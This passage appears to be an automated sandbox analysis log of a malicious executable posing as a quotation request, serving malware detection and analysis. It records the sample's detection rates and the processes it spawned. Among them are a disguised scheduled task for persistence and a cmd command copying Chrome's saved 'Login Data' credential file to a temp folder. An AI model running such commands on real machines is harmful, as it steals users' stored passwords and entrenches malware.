            Source: REQUEST FOR QUOTATION.exe | Virustotal: Detection: 28%
            Source: REQUEST FOR QUOTATION.exe | ReversingLabs: Detection: 14%
            Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe | File read: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe
            Source: unknown | Process created: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe 'C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe'
            Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp'
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe
            Source: unknown | Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
            Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: